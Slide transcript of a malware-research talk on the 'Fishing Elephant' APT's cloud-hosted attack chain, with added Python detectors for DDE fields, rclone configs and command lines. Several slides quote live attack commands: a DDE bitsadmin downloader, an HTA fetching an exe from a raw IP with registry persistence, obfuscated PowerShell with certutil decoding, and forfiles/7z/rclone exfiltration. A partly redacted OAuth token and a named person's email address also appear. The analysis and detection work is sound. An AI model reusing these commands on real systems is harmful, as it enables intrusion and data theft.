Fishing Elephant, or how to build cloud based APT

SLIDE 1

Fishing Elephant, or how to build cloud based APT
SLIDE 2

$ whois mak

  • Independent Malware Researcher / Founder of MalwareLab.pl
  • Dragon Sector CTF
  • RE/Exploit dev
  • Automatization / Formal methods
  • @maciekkotowicz
  • mak@malwarelab.pl
  • Principal Malware Researcher @ CERT.pl
  • Senior Researcher @ Kaspersky GReAT
SLIDE 3

How to build APT-like attack

SLIDE 4
SLIDE 5

  • Payload hosted on cloud-storage services
  • Exfiltration to cloud-storage providers

SLIDE 6
SLIDE 7

  • Payload hosted on cloud-storage services
  • Intermediate stages run on PaaS platforms
  • Exfiltration to cloud-storage providers
  • C2 hosted on PaaS or free hosting platforms

SLIDE 8
SLIDE 9

  • Open source malware
  • Payload hosted on cloud-storage services
  • Intermediate stages run on PaaS platforms
  • Exfiltration to cloud-storage providers
  • Open source exploits/vulnerabilities
  • C2 hosted on PaaS or free hosting platforms

SLIDE 10
SLIDE 11

How Fishing Elephant did it

SLIDE 12
SLIDE 13
SLIDE 14
SLIDE 15
SLIDE 16
SLIDE 17

Campaign Summary

  • Spear phishing emails with a link to fake Google Drive
  • Docs look-alike app hosted on heroku dropping malicious hta
  • Decoy image hosted on Google Drive opened via launching a browser
  • Payload link hidden via url-shortening service bitly and others
  • Payload hosted on cloud storage service (dropbox, yandex disk, asuswebstorage)

SLIDE 18
SLIDE 19

SET e ""
REF c REF d REF e
DDE C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\cmd.exe
SET c "" "cmd /c bitsadmin /transfer data /priority high https://www.dropbox.com/s/pgm729t85j5h1uq/o.txt?dl=1 C:\Users\Public\o.hta & start C:\Users\Public\o.hta"
SET d ""
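The field codes on this slide show why a document scanner cannot simply look for the string "DDEAUTO" in one place: the command is assembled from SET and REF fields, and Word only executes the concatenation of the instrText runs. The following scanner is an added, defender-side example (not code from the talk, from MalwareLab.pl or from any named project): it opens a .docx in memory, joins the w:instrText runs of every Word XML part, and flags DDE/DDEAUTO fields, the SET/REF/QUOTE fields used for splitting, and LOLBin paths inside the field text. The two test documents it builds are constructed here for the example (one splits "DDEAUTO" across runs and reuses the "..\..\" path walk from this slide, the other is an ordinary page-number field); they contain no real payload and are not usable phishing documents.

```python
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
INSTR_TAG = "{%s}instrText" % W_NS
FLD_SIMPLE_TAG = "{%s}fldSimple" % W_NS
INSTR_ATTR = "{%s}instr" % W_NS

# DDE / DDEAUTO launch a program; SET, REF and QUOTE are the fields used to
# assemble a command from innocent-looking pieces, as on slide 19.
LAUNCH_FIELDS = {"DDE", "DDEAUTO"}
SPLIT_FIELDS = {"SET", "REF", "QUOTE"}
# Strings that rarely belong in a legitimate field code.
LOLBIN_HINTS = ("cmd.exe", "powershell", "bitsadmin", "certutil", "mshta", "\\..\\")


def extract_field_codes(docx_bytes):
    """Return one joined field-code string per Word XML part of the .docx.

    Word executes the concatenation of all w:instrText runs, so the scanner joins
    the runs before looking for keywords; a run-by-run scan would miss
    "DDE" + "AUTO" split across two runs.
    """
    codes = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            root = ET.fromstring(zf.read(name))
            for el in root.iter(FLD_SIMPLE_TAG):   # simple fields keep the code in an attribute
                codes.append(el.get(INSTR_ATTR, ""))
            runs = [el.text or "" for el in root.iter(INSTR_TAG)]
            if runs:                                # complex fields: join every run in document order
                codes.append("".join(runs))
    return codes


def analyze_docx(docx_bytes):
    """Return a finding for every field code that could launch a program."""
    findings = []
    for code in extract_field_codes(docx_bytes):
        flat = " ".join(code.split())               # collapse the whitespace runs attackers add
        keywords = set(re.findall(r"[A-Za-z]+", flat.upper()))
        hints = [h for h in LOLBIN_HINTS if h.lower() in flat.lower()]
        if keywords & LAUNCH_FIELDS or hints:
            findings.append({
                "field": flat,
                "dde": bool(keywords & LAUNCH_FIELDS),
                "split_fields": sorted(keywords & SPLIT_FIELDS),
                "hints": hints,
            })
    return findings


def build_test_docx(field_runs):
    """Construct a minimal .docx whose only field is split across the given runs.

    Constructed test input: no styles, relationships or body text, so it is not a
    usable document, only enough structure for the scanner to parse.
    """
    runs_xml = "".join(
        '<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>' % html.escape(r)
        for r in field_runs
    )
    document = (
        '<w:document xmlns:w="%s"><w:body><w:p>' % W_NS
        + '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        + runs_xml
        + '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        + "</w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed samples: the first splits "DDEAUTO" across runs and reuses the
# "..\..\" path walk from slide 19; the second is an ordinary page-number field.
SPLIT_DDE_RUNS = [
    "DDE",
    "AUTO C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe ",
    '"/c echo constructed-test"',
]
BENIGN_RUNS = [" PAGE ", "\\* MERGEFORMAT "]

if __name__ == "__main__":
    for label, runs in (("split-dde", SPLIT_DDE_RUNS), ("benign", BENIGN_RUNS)):
        print(label, analyze_docx(build_test_docx(runs)))
```

Run against a real document, extract_field_codes also covers headers, footers and footnotes, which is where field-based droppers are sometimes hidden; the "split_fields" entry tells the analyst that the DDE string was assembled from SET/REF fields rather than written out in one piece.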

SLIDE 20

<script language="VBScript">
window.moveTo -3000, -3000
Dim MaCommande,Ws,Ret
Set Ws = CreateObject("wscript.Shell")
Ws.RegWrite "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ", "C:\Users\Public\hplogs.exe ", "REG_SZ"
MaCommande = "cmd /c bitsadmin /transfer data /priority high http://185.163.111.90/D3e71ffad76f3d44d6ae482205f3a2c94/hplogs.exe C:\Users\Public\hplogs.exe "
Ret = Ws.run(MaCommande,0,True)
window.close()

SLIDE 21
SLIDE 22

Campaign Summary

  • Spear phishing emails with references to internal documents, and current events
  • DDE abused to fetch second stage scripts from Dropbox
  • No decoy documents, just blank page
  • Off the shelf tools (bitsadmin) used for downloading
  • Payload link hidden via url-shortening service bitly and others
SLIDE 23

Newest modifications

  • Geofencing for first stage hosted on heroku
    ○ If check failed - redirect to https://www.dropbox[.]com/s/apvco1h77036wgb/os.txt?dl=1
    ○ Else redirect to batch code also hosted on dropbox
  • certutil used for decoding final payload

cmd /b START /MIN /c powershell -ep -nop -w hidden (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T").DownloadFile('ht'+'tps://www.dropbox.com/s/tjr1jx12qnlz425/b-os.txt?dl=1','C:\Windows\Tasks\certs.txt')
certutil -decode C:\Windows\Tasks\certs.txt C:\Windows\Tasks\dnplqs.exe
ICACLS "C:\Windows\Tasks\dnplqs.exe" /grant "%computername%":F
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /d "C:\Windows\Tasks\dnplqs.exe"

SLIDE 24

Open Source Malware

SLIDE 25
SLIDE 26
SLIDE 27

Modded Ares

  • Upload file
  • Download file
  • Zipping file or directory
  • Change directory
  • Execute cmd.exe commands
SLIDE 28

  • Open Source
  • Open Source
  • Leaked/Cracked

SLIDE 29

Exfiltration

SLIDE 30

powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden
  (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/[redacted]/rclone.conf?dl=1','rclone.conf'),
  (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/fwo3ec2gfgddkr1/system.exe?dl=1','system.exe'),
  (New-Object System.Net.WebClient).DownloadFile('https://www.dropbox.com/s/3gkzclfdrgzslkp/tmp.exe?dl=1','tmp.exe');

SLIDE 31
  • system.exe
    ○ rclone.exe
    ○ 9b363e52d7c1a96a59964e5ebad6ed8
  • tmp.exe
    ○ 7z.exe
    ○ 5e0cfb5f9d4cc24c92c7ebb184d6c9b1

SLIDE 32

Rclone is a command line program to manage files on cloud storage.

[update]
type = drive
client_id =
client_secret =
service_account_file =
token = {"access_token":"ya29.GlscBYp[redacted]qAVx0sKO4RE5wUCtvx3FLG_nNJ9GQa4liLz7KxrsXpYzmbRfVO","token_type":"Bearer","refresh_token":"1/r[redacted]Ve4ZdWOqem_eA2ho","expiry":"2017-12-08T15:08:21.9850685+05:30"}
team_drive =
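For a responder, a recovered rclone.conf like the one above is the most valuable artefact on this slide: it names the backend, and an embedded OAuth token whose refresh_token is present stays usable long after the access_token's expiry has passed, which is what makes the attacker's account reachable to victims and researchers alike. The script below is an added triage example (not part of the talk and not rclone's own code): it parses such a config with configparser, lists which remotes carry credentials in the file itself, and checks the token expiry against a reference time. The config it reads is constructed for the example with placeholder secrets; the [update] remote copies the shape shown on the slide, and a second S3 remote is added to show the same check on another backend (the option names are rclone's, the values are made up).

```python
import configparser
import json
import re
from datetime import datetime, timezone

# Constructed rclone.conf in the shape shown on slide 32 (a "drive" remote with
# an inline OAuth token) plus an S3 remote. Every secret value is a placeholder.
SAMPLE_RCLONE_CONF = """\
[update]
type = drive
client_id =
client_secret =
service_account_file =
token = {"access_token":"ya29.PLACEHOLDER","token_type":"Bearer","refresh_token":"1/PLACEHOLDER","expiry":"2017-12-08T15:08:21.9850685+05:30"}
team_drive =

[backup]
type = s3
provider = AWS
access_key_id = AKIAPLACEHOLDER
secret_access_key = PLACEHOLDER
region = eu-west-1
"""

# Keys whose non-empty value means the file alone grants access to the remote.
CREDENTIAL_KEYS = ("token", "access_key_id", "secret_access_key", "pass",
                   "client_secret", "service_account_file")

# Constructed reference instant used when the example is run as a test.
REFERENCE_TIME = datetime(2020, 6, 1, tzinfo=timezone.utc)


def parse_expiry(value):
    """Parse rclone's RFC 3339 expiry. rclone writes up to 7 fractional digits,
    which datetime.fromisoformat rejects on older Pythons, so trim to 6."""
    if not value:
        return None
    trimmed = re.sub(r"(\.\d{6})\d+", r"\1", value)
    return datetime.fromisoformat(trimmed.replace("Z", "+00:00"))


def triage_rclone_conf(text, now):
    """Return one record per remote: backend type, which credentials are embedded,
    whether the OAuth access token is expired, and whether a refresh token (which
    outlives the access token) is present."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    report = []
    for remote in cp.sections():
        sec = cp[remote]
        record = {
            "remote": remote,
            "type": sec.get("type", "?"),
            "credentials": [k for k in CREDENTIAL_KEYS if sec.get(k, "").strip()],
            "token_expired": None,      # stays None for remotes without an OAuth token
            "refresh_token": False,
        }
        if sec.get("token", "").strip():
            token = json.loads(sec["token"])
            record["refresh_token"] = bool(token.get("refresh_token"))
            expiry = parse_expiry(token.get("expiry"))
            record["token_expired"] = expiry is not None and expiry <= now
        report.append(record)
    return report


if __name__ == "__main__":
    for rec in triage_rclone_conf(SAMPLE_RCLONE_CONF, datetime.now(timezone.utc)):
        print(rec)
```

The useful output is the pair token_expired / refresh_token: an expired access token next to a live refresh token means the account is still usable from this file, so the provider-side revocation (and the report to the provider) cannot wait for the access token to lapse.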

SLIDE 33

for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p C:\Users\PATOMD~1 /s /m *%%G -d 13-05-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_C_%date:/=.% %time::=.%.zip @path"
for %%G in (.vcf,.pst,.zip,.rar,.jpg,.jpeg,.doc,.docx,.docm,.xls,.xlk,.xlsx,.slk,.pdf,.ppt,.pptx,.ppsx,.rtf,.xps,.csv,.inp,.rb) do forfiles /p G: /s /m *%%G -d 01-01-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\%computername%_G_%date:/=.% %time::=.%.zip @path"
cd %appdata%
system move --delete-after C:\Users\Public\Window\ update:BD
del /q/f/s %TEMP%\*.*
del /q/s/f C:\Windows\Tasks\*.txt
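Taken together, slides 19, 20, 23 and 33 give the whole chain in terms of command lines: bitsadmin or PowerShell download, certutil decode, the Winlogon "Load" value for persistence, forfiles feeding 7-Zip, and an rclone "move --delete-after" to a remote. Because every step is an off-the-shelf binary, each one on its own is noisy to alert on; the chain is what is distinctive. The following is an added detection example (not the talk's code and not tied to any SIEM product) that runs a small rule set over process-creation command lines, first undoing the two light obfuscations seen on slide 23 (PowerShell backtick escapes such as "`N`e`T" and the 'ht'+'tps' concatenation), and then reports hosts on which several distinct stages of the chain appear. The events, hostnames, URLs and paths are constructed for the example and are not real telemetry; the rule names and the stage labels are mine.

```python
import re
from collections import defaultdict

# Constructed process-creation events (host, command line), modelled on the
# command lines quoted on slides 19, 20, 23 and 33 but with invented hosts and
# URLs. The two ws02 lines are routine administration, included as negatives.
SAMPLE_EVENTS = [
    ("ws01", r'cmd /c bitsadmin /transfer data /priority high https://files.example.invalid/o.txt?dl=1 C:\Users\Public\o.hta & start C:\Users\Public\o.hta'),
    ("ws01", r'''powershell -ep -nop -w hidden (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T").DownloadFile('ht'+'tps://files.example.invalid/b-os.txt?dl=1','C:\Windows\Tasks\certs.txt')'''),
    ("ws01", r'certutil -decode C:\Windows\Tasks\certs.txt C:\Windows\Tasks\dnplqs.exe'),
    ("ws01", r'REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /d "C:\Windows\Tasks\dnplqs.exe"'),
    ("ws01", r'forfiles /p C:\Users\PATOMD~1 /s /m *.docx -d 13-05-2020 /c "cmd /c C:\Users\PATOMD~1\AppData\Roaming\tmp.exe a -tzip C:\Users\Public\Window\ws01_C.zip @path"'),
    ("ws01", r'system move --delete-after C:\Users\Public\Window\ update:BD'),
    ("ws02", r'certutil -verify -urlfetch C:\certs\corp.cer'),
    ("ws02", r'powershell -NoProfile -Command Get-Date'),
]


def normalize(cmdline):
    """Undo the obfuscations seen on slide 23 so plain substring rules apply:
    backtick escapes inside PowerShell strings ("`N`e`T" -> "NeT") and literal
    concatenation ('ht'+'tps' -> 'https'). Whitespace and case are folded too."""
    s = re.sub(r"`(?=[A-Za-z.])", "", cmdline)
    s = re.sub(r"'\s*\+\s*'", "", s)
    return " ".join(s.split()).lower()


# (rule name, chain stage, pattern over the normalized command line)
RULES = [
    ("download_bitsadmin",    "download", re.compile(r"bitsadmin\s+/transfer\b.*https?://")),
    ("download_powershell",   "download", re.compile(r"powershell.*(net\.webclient|downloadfile|downloadstring|invoke-webrequest)")),
    ("decode_certutil",       "decode",   re.compile(r"certutil\s+[-/]decode\b")),
    ("persist_winlogon_load", "persist",  re.compile(r"currentversion\\windows.*\bload\b")),
    ("collect_archive_docs",  "collect",  re.compile(r"forfiles\b.*-tzip|\b7z(\.exe)?\s+a\s")),
    ("exfil_rclone_move",     "exfil",    re.compile(r"\bmove\s+--delete-after\b.*\s\w+:\S*")),
]


def classify(cmdline):
    """Names of every rule that matches one command line."""
    norm = normalize(cmdline)
    return [name for name, _stage, rx in RULES if rx.search(norm)]


def find_chains(events, min_stages=3):
    """Group rule hits per host and return the hosts on which at least
    `min_stages` distinct stages of download-decode-persist-collect-exfil
    appear, with the sorted list of stages seen."""
    stages = defaultdict(set)
    for host, cmd in events:
        norm = normalize(cmd)
        for _name, stage, rx in RULES:
            if rx.search(norm):
                stages[host].add(stage)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, cmd in SAMPLE_EVENTS:
        print(host, classify(cmd))
    print(find_chains(SAMPLE_EVENTS))
```

The per-host stage count is a deliberately simple correlation; in practice the same grouping would be keyed on host and a time window, and the "collect" rule would be widened to whatever archiver the environment sees. The "persist" pattern also covers the RegWrite form from the HTA on slide 20 if script contents rather than command lines are fed in.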

SLIDE 34

Pros of cloud-based/OSS solutions

SLIDE 35
  • Mostly free, easy to set up, few clicks and you have a working hosting
  • Hard to figure out from outside who uses a service
  • Easy, scriptable access to your assets
  • Can kiss code-based attribution goodbye
  • Good luck getting a provider to take down an account (with some notable exceptions such as heroku)

SLIDE 36

Cons of cloud-based/OSS solutions

SLIDE 37
  • Metadata, a lot of metadata
SLIDE 38
  • Metadata, a lot of metadata

...
{
  "kind": "drive#permission",
  "etag": "\"1Jn1MfFS5e4oWHHjbcjtFXlj934\"",
  "id": "10242864118326064187",
  "selfLink": "https://www.googleapis.com/drive/v2beta/files/1MRlT8uoUaVITWlC_5qsWfu98vuiEq6pC/permissions/10242864118326064187",
  "userId": "105520765509160710619",
  "name": "Bushra Fatima",
  "emailAddress": "fatima.bushra1990@gmail.com",
  "domain": "gmail.com",
  "role": "owner",
  "type": "user",
}
...

SLIDE 39
  • Metadata, a lot of metadata
  • API keys needed for accessing resources
SLIDE 40
  • Metadata, a lot of metadata
  • API keys needed for accessing resources
  • Cloud operators have a different visibility into your stuff than typical hosters

SLIDE 41

Summary

SLIDE 42

Fishing Elephant summary

  • Relatively new actor (since at least 2017)
  • Not sophisticated
    ○ Lack of in-house developed tools
    ○ However uses interesting methods to glue attacks together
  • Heavy use of PaaS and cloud storage
  • Relies on open source tools
  • Targets South-East part of Asia
  • Probably relies on phishing to get access to email servers
  • Hard to catch ;/
SLIDE 43

Cloud-relaying attacks, summary

Pros

  • Easy to setup and maintain
  • Hard to take down
  • Hard to detect
  • Hard to attribute

Cons

  • Leaves a lot of metadata
  • Access to accounts shared with victims and researchers
SLIDE 44

Q & A?

@malwarelabpl contact@malwarelab.pl @maciekkotowicz